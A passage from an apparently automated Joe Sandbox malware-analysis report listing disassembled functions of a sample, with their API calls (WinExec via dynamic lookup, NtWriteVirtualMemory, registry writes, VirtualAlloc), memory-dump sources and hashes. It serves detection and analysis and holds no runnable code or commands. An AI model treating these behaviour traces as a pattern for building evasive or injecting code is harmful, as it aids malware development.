                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                      • Opcode ID: a741772963aee41e49a2a1f539ce8e2922d6e77e106eedff5643865012c18687
                                                                                                                                      • Instruction ID: 05dea1eb5984cce2f5032dcd92bf659c60a7dd222389037519777dc530a89563
                                                                                                                                      • Opcode Fuzzy Hash: a741772963aee41e49a2a1f539ce8e2922d6e77e106eedff5643865012c18687
                                                                                                                                      • Instruction Fuzzy Hash: B3018C75A40304BFEB25EFB4DC12B5B77EDEB48B10F918920B508D3A40DAB4AD00AB24
                                                                                                                                      Function 02C48410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02C48478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                      • Opcode ID: 8f93cace4291f86abe7c5b123408d080f9f3f7f4d0494010e9e538e9a10a54c9
                                                                                                                                      • Instruction ID: 15e5be89db59b10d03c1376575fe2479f1c1668d6262386a6a896fc8c9e32502
                                                                                                                                      • Opcode Fuzzy Hash: 8f93cace4291f86abe7c5b123408d080f9f3f7f4d0494010e9e538e9a10a54c9
                                                                                                                                      • Instruction Fuzzy Hash: 6AF08C75A40304BFEB25EFB4DC12B5B77ADEB48B10F918920B508D3A40DAB4A900AB24
                                                                                                                                      Function 02C45BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C45C10
                                                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C45C3E
                                                                                                                                        • Part of subcall function 02C37D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02C43888,02C45C7E,00000000,02C45CFC,?,?,02C43888), ref: 02C37D66
                                                                                                                                        • Part of subcall function 02C37F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02C43888,02C45C99,00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C37F3F
                                                                                                                                      • GetLastError.KERNEL32(00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C45CA3
                                                                                                                                        • Part of subcall function 02C3A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C3C361,00000000,02C3C3BB), ref: 02C3A71F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 503785936-0
                                                                                                                                      • Opcode ID: 4b27867483863c2330f2790988e4724fe1693b96d4989c315da0de9ad8caf21c
                                                                                                                                      • Instruction ID: 12f69ae60be33bd6916f32d5c0a01406dfbd91539a0ef4d45055bee115005c1a
                                                                                                                                      • Opcode Fuzzy Hash: 4b27867483863c2330f2790988e4724fe1693b96d4989c315da0de9ad8caf21c
                                                                                                                                      • Instruction Fuzzy Hash: 2A318375A006489FDB01EFA4C880BEEB7F6AF48314F908965E904E7380DB755E05DFA1
                                                                                                                                      Function 02C4E6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02D85914), ref: 02C4E704
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E73C
                                                                                                                                      • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E747
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                      • Opcode ID: cc7da6f0a91d036c4e63578bd2eb868c9fe623d1d8929618d41013b529da07e4
                                                                                                                                      • Instruction ID: 1d54447ffb0e746ca168afd71625b57dade13e600e0cfffe651503f997691624
                                                                                                                                      • Opcode Fuzzy Hash: cc7da6f0a91d036c4e63578bd2eb868c9fe623d1d8929618d41013b529da07e4
                                                                                                                                      • Instruction Fuzzy Hash: 9C110A71A50204AFEB15FBA8DC81D6A7BADEB09720F914870F504D7350DA34EE40EA64
                                                                                                                                      Function 02C4E6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02D85914), ref: 02C4E704
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E73C
                                                                                                                                      • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E747
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                      • Opcode ID: cab05c2177a38e14ccd67729476451cdc0147365d6785dacea8d67ebaa300b37
                                                                                                                                      • Instruction ID: 7025a6a12bfa29ebd2be4b5c181371efef218cb94f2522d02057f00056349780
                                                                                                                                      • Opcode Fuzzy Hash: cab05c2177a38e14ccd67729476451cdc0147365d6785dacea8d67ebaa300b37
                                                                                                                                      • Instruction Fuzzy Hash: 62110A71A50204AFEB15FBA8DC81D6A7BADEB09720F914870F504D7350DA34EE40EA64
                                                                                                                                      Function 02C3E2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ClearVariant
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                      • Opcode ID: d3c5128cd5883b3dbb19d42a97199c608e8a39298577f9c4db77a05d82ee4516
                                                                                                                                      • Instruction ID: 2ef3ee6ea144926d29f65891675ee42734383efea1cb6ac7fb6af08ce2bc2146
                                                                                                                                      • Opcode Fuzzy Hash: d3c5128cd5883b3dbb19d42a97199c608e8a39298577f9c4db77a05d82ee4516
                                                                                                                                      • Instruction Fuzzy Hash: E0F0C22470420086C7A37B3AD9C466D279AAF84720B401C26E48EAB245CB34ED45DB63
                                                                                                                                      Function 02C34CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
                                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 02C34D07
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02C34D19
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$Free$Alloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 986138563-0
                                                                                                                                      • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                      • Instruction ID: ecc620ef0adb98f2bc9497b6fcbcd21215a8d69b8cadd030c834632bbbe1d52c
                                                                                                                                      • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                      • Instruction Fuzzy Hash: D0E012B81056015EEF2B2F21AC40B37372ABFC1745B184C99E804CA150DBB5C841BD34
                                                                                                                                      Function 02C47064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 02C47362
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeString
                                                                                                                                      • String ID: H
                                                                                                                                      • API String ID: 3341692771-2852464175
                                                                                                                                      • Opcode ID: 8c705ad773aa16023462de185ca63ac80d3bda265738827f957a648109530cab
                                                                                                                                      • Instruction ID: 18ce2942b171da082ed23940f4a30feac733fd6d5be5bbe5e32cbc3644887730
                                                                                                                                      • Opcode Fuzzy Hash: 8c705ad773aa16023462de185ca63ac80d3bda265738827f957a648109530cab
                                                                                                                                      • Instruction Fuzzy Hash: 4DB1F374A01608DFDB15CF99D880A9EFBF6FF89314F148569E809AB320DB31A949CF50
                                                                                                                                      Function 02C48824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                        • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
                                                                                                                                      • FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3283153180-0
                                                                                                                                      • Opcode ID: 27b1e5532e8fa65fba55b8cf7fef06d16c545b38b8589158d09513af69d942c4
                                                                                                                                      • Instruction ID: 876d80917107416cf0aef5388c74ab9baf6649727deee3dcbb6a0b12ca8f1ffd
                                                                                                                                      • Opcode Fuzzy Hash: 27b1e5532e8fa65fba55b8cf7fef06d16c545b38b8589158d09513af69d942c4
                                                                                                                                      • Instruction Fuzzy Hash: 81114F70A40305ABEF16FBA4DC06A5F77BEEB45710F550AF4B10CA7A40DEB4D900AB54
                                                                                                                                      Function 02C3E6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VariantCopy.OLEAUT32(00000000,00000000), ref: 02C3E709
                                                                                                                                        • Part of subcall function 02C3E2EC: VariantClear.OLEAUT32(?), ref: 02C3E2FB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Variant$ClearCopy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 274517740-0
                                                                                                                                      • Opcode ID: d0737b2daefda1b24bb8018fb002f96564f84ad4a1094679b78b772ea5deb5a5
                                                                                                                                      • Instruction ID: 1f454b962f851d6ddcae387f50b9eae25594b377686405703df08f55b3a796ec
                                                                                                                                      • Opcode Fuzzy Hash: d0737b2daefda1b24bb8018fb002f96564f84ad4a1094679b78b772ea5deb5a5
                                                                                                                                      • Instruction Fuzzy Hash: 0911A12171031087CB23AF29CDC566B77EAEFC67507059C26EA4A8B255DB31CC41DBA2
                                                                                                                                      Function 02C315CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C31A03), ref: 02C315E2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID: 0`
                                                                                                                                      • API String ID: 4275171209-3339448193
                                                                                                                                      • Opcode ID: 93f3f8f16bf150280ae0a5234ef29d3fda9653b6c3835542e184020d9ec05bb5
                                                                                                                                      • Instruction ID: ea47e52f824054a7dd528c5a83d986dc1129c3c944e20efb11ed16ae41ee52a4
                                                                                                                                      • Opcode Fuzzy Hash: 93f3f8f16bf150280ae0a5234ef29d3fda9653b6c3835542e184020d9ec05bb5
                                                                                                                                      • Instruction Fuzzy Hash: 2DF0E7F1B513005FEB06DF799D443056AD6E789348F14CA79E609DB298E7B194118B14
                                                                                                                                      Function 02C3E384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1927566239-0
                                                                                                                                      • Opcode ID: a53b91ef3837f6d3cbb67800c531273a8186b0d2077bb124b33fc8e984af720e
                                                                                                                                      • Instruction ID: 169d269799498383b28ef78e97ab7cec88e34dc37119535cf41ae2fab888a405
                                                                                                                                      • Opcode Fuzzy Hash: a53b91ef3837f6d3cbb67800c531273a8186b0d2077bb124b33fc8e984af720e
                                                                                                                                      • Instruction Fuzzy Hash: 59317C71A00209AFDB52DEA8C985AEE77E8EF4C324F444961F919D3240D734EA50CFA2
                                                                                                                                      Function 02C46CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02C46D41,?,?,?,00000000), ref: 02C46D21
                                                                                                                                        • Part of subcall function 02C34C0C: SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeFromProgString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4225568880-0
                                                                                                                                      • Opcode ID: 3fad58aedb1c75769ecbb75a2cce9eebf0dd03e9eeed947982819afc7827c010
                                                                                                                                      • Instruction ID: a125ab59acde35d247f3d8aebd8c87fdc0ae31bad23e4d0e4996637bd49db177
                                                                                                                                      • Opcode Fuzzy Hash: 3fad58aedb1c75769ecbb75a2cce9eebf0dd03e9eeed947982819afc7827c010
                                                                                                                                      • Instruction Fuzzy Hash: FCE06D31604708BBE716EBA1DC519AA77EDEB4AB10B614871E801D3610DA74AE00A860
                                                                                                                                      Function 02C35814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C35832
                                                                                                                                        • Part of subcall function 02C35A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C30000,02C5D790), ref: 02C35A94
                                                                                                                                        • Part of subcall function 02C35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AB2
                                                                                                                                        • Part of subcall function 02C35A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AD0
